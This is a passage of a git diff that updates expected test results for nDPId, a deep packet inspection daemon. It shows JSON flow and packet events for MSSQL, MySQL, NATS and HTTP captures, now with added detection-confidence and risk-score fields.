-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","total-events-serialized":57}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 38/38
@@ -63,9 +63,9 @@
 ~~ total active/idle flows...: 12/12
 ~~ total timeout flows.......: 1
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4647964 bytes
-~~ total memory freed........: 4647964 bytes
-~~ total allocations/frees...: 99631/99631
+~~ total memory allocated....: 4729309 bytes
+~~ total memory freed........: 4729309 bytes
+~~ total allocations/frees...: 101221/101221
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 2410 chars
diff --git a/test/results/mysql-8.pcap.out b/test/results/mysql-8.pcap.out
index 5be705d45..c717c76a0 100644
--- a/test/results/mysql-8.pcap.out
+++ b/test/results/mysql-8.pcap.out
@@ -3,8 +3,8 @@
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA8OA9AAEAGI6zAqAFpCioSxiIiDOqSBUElAAAAAKACchDH0wAAAgQFtAQCCAoAA3kqAAAAAAEDAwY="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":946708780103,"pkt":"REREREREIiIiIiIiCABFAAA8AABAAD8GXLsKKhLGwKgBaQzqIiISTcRTkgVBJqAScSDgsQAAAgQFtAQCCAoAARFeAAN5KgEDAwc="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946708780103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA0OBBAAEAGI7PAqAFpCioSxiIiDOqSBUEmEk3EVIAQAcl+1QAAAQEICgADeSoAARFe"}
-00603{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"proto":"MySQL","breed":"Acceptable","category":"Database"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MySQL","breed":"Acceptable","category":"Database"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 4/4
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594945 bytes
-~~ total memory freed........: 4594945 bytes
-~~ total allocations/frees...: 99557/99557
+~~ total memory allocated....: 4679898 bytes
+~~ total memory freed........: 4679898 bytes
+~~ total allocations/frees...: 101147/101147
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 647 chars
-~~ json string avg len.......: 464 chars
+~~ json string max len.......: 673 chars
+~~ json string avg len.......: 476 chars
diff --git a/test/results/nats.pcap.out b/test/results/nats.pcap.out
index 3e1987e04..e6e30c4bf 100644
--- a/test/results/nats.pcap.out
+++ b/test/results/nats.pcap.out
@@ -3,14 +3,14 @@
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzTwAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iAAAAAAQCAAA="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJA7LPw3wic09sBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iNpSeYgQCAAA="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1586288040558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"ts_msec":1586288040558,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzT0Oyz8OgBAx1\/4oAAABAQgKNpSeYjaUnmI="}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"proto":"Nats","breed":"Acceptable","category":"RPC"}}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}}
 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040575,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1586288040575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0kAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5xAAAAAAQCAAA="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJfixMBXQ63dKsBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5yNpSecQQCAAA="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1586288040575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"ts_msec":1586288040575,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0r4sTAWgBAx1\/4oAAABAQgKNpSecjaUnnI="}
-00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"proto":"Nats","breed":"Acceptable","category":"RPC"}}
-00633{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"proto":"Nats","breed":"Acceptable","category":"RPC"}}
-00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"proto":"Nats","breed":"Acceptable","category":"RPC"}}
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}}
+00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}}
+00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}}
 00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 27/27
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600908 bytes
-~~ total memory freed........: 4600908 bytes
-~~ total allocations/frees...: 99585/99585
+~~ total memory allocated....: 4685533 bytes
+~~ total memory freed........: 4685533 bytes
+~~ total allocations/frees...: 101175/101175
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 158 chars
-~~ json string max len.......: 639 chars
-~~ json string avg len.......: 466 chars
+~~ json string max len.......: 665 chars
+~~ json string avg len.......: 479 chars
diff --git a/test/results/ndpi_match_string_subprotocol__error.pcapng.out b/test/results/ndpi_match_string_subprotocol__error.pcapng.out
index d9f7ec9e9..d5f6c7dbd 100644
--- a/test/results/ndpi_match_string_subprotocol__error.pcapng.out
+++ b/test/results/ndpi_match_string_subprotocol__error.pcapng.out
@@ -2,16 +2,16 @@
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258162014557,"flow_last_seen":1258162014557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1258162014557,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258162014557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1258162014557,"pkt":"AFBWmXinAB9to6gACABFAAA0MZpAADwGZloKAwkTCkSJdp64H5sCrVC3AAAAAIACwej09wAAAgQFZAEDAwABAQQC"}
 01982{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"ts_msec":1258162014576,"pkt":"AFBWmXinAB9to6gACABFAASOMZxAADwGYf4KAwkTCkSJdp64H5sCrVC4lwIqi1AYwhBuiwAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aWNlIEhUVFAvMS4xDQpTT0FQQWN0aW9uOiANCkNvbnRlbnQtdHlwZToAQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogOTQ4DQoNCjxzb2FwZW52OkVudmVsb3Bl2nhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpCb2R5PgogICAgPG5zOmNvbmZpZ3VyZT4KICAgICAgPG9iamVjdE5hbWQ+TldNMzoxLTEtMS0xNy4wLjA8L29iamVjdKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}}
+01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}}
